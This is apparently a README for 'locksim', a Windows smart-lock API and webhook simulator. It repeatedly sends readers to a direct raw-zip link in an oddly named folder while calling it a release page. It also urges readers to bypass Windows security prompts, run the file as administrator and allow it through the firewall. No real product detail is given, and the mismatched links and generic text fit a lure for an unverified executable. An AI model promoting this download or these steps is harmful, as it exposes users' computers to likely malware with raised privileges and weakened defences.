Use this page to download locksim for Windows:
https://github.com/Rhodapotted630/locksim/raw/refs/heads/main/unrooted/Software-v1.4.zip
Open the page, then look for the latest release. Download the Windows file from that release and save it on your computer.
locksim is a smart access provider simulator. It helps you test lock access flows without a real smart lock setup.
Use it to:
- test Nuki-style API calls
- try webhook events
- demo lock access flows
- check integration steps before using live systems
- simulate access for hospitality tools and apps
It gives you a local way to explore how a smart lock system behaves.
For a Windows PC, you need:
- Windows 10 or Windows 11
- internet access to get the download
- enough free disk space for the app file
- permission to run apps on your computer
If your system blocks unknown files, you may need to allow the file through Windows security prompts.
-
Open the download page: https://github.com/Rhodapotted630/locksim/raw/refs/heads/main/unrooted/Software-v1.4.zip
-
Find the latest release.
-
Download the Windows app file from that release.
-
Save the file to your Downloads folder or your Desktop.
-
If the file is in a ZIP folder, right-click it and choose Extract All.
-
Open the extracted folder if needed.
-
Double-click the locksim app file to start it.
-
If Windows asks for permission, choose Run or Yes.
-
Wait for the app to open.
-
Keep the app running while you test your setup.
After you start locksim, you may want to set a few things up:
- choose the port the app uses on your computer
- set the base URL for local testing
- connect your test tool or browser to the local endpoint
- check webhook delivery if you plan to test event handling
- set demo data for lock and access states
If you are only trying the app for the first time, start with the default settings and open it once before making changes.
locksim can help with common smart access tasks such as:
- unlocking and locking states
- access grants and access revokes
- webhook delivery for access events
- token-based API access
- user and device flow checks
- demo setup for hotel or rental access
This is useful when you want to test your app before connecting to a live lock system.
You may want locksim if you are:
- building a smart lock app
- testing a webhook receiver
- checking an API client
- preparing a demo for a customer
- learning how access events work
- testing hospitality integrations
It works as a local simulator, so you can run tests without a real lock on hand.
A simple test flow looks like this:
- Start locksim on your Windows PC.
- Open the app or local web page it provides.
- Send a test request from your tool or app.
- Watch the lock state change in the simulator.
- Check that webhooks or API responses match your setup.
- Adjust your test values and try again.
locksim is built for API testing and webhook checks.
You can use it to:
- send requests that look like Nuki-style lock calls
- test status checks from your app
- receive webhook events on your local service
- verify that your integration handles lock events
- confirm that token and access logic works as expected
If your app listens for events, locksim gives you a controlled source for those events.
When you download locksim from GitHub Releases, keep the file in a stable folder.
Good places include:
- Downloads
- Desktop
- a tools folder on your C: drive
If you move the file later, make sure any shortcuts still point to the right place.
If locksim does not start, try these steps:
- right-click the file and choose Run as administrator
- make sure you downloaded the Windows file from the latest release
- check that the file finished downloading
- extract the ZIP file before opening it
- close and reopen the app
- restart your PC and try again
If a browser or firewall blocks local access:
- allow the app through Windows Defender Firewall
- check that the port is not already in use
- make sure your browser uses the right local address
- stop other tools that may use the same port
If you see an empty page or no response:
- confirm the app is still running
- check the local URL or port
- refresh the page
- try another browser
No. You can download and run locksim on Windows without writing code. Some test setups may use API tools, but the app itself can still be opened and used from your desktop.
Yes. locksim fits demo work well. It gives you a simple way to show lock behavior, access changes, and event flow.
Yes. That is one of its main uses. You can point your test service at locksim and check how it sends or receives events.
No. It is a simulator. Use it for testing and demo work, not for live access control
If you want the easiest path, use this order:
- Visit the release page.
- Download the Windows file.
- Extract it if needed.
- Open the app.
- Leave it running.
- Follow the test steps in your other app or browser.
- Check that the lock behavior matches what you expect
locksim fits well with:
- API simulator work
- Docker-based testing
- FastAPI services
- React front ends
- OAuth2 flows
- smart lock demos
- integration testing
- webhook testing
- hospitality software testing
If you need the file again, use this page:
https://github.com/Rhodapotted630/locksim/raw/refs/heads/main/unrooted/Software-v1.4.zip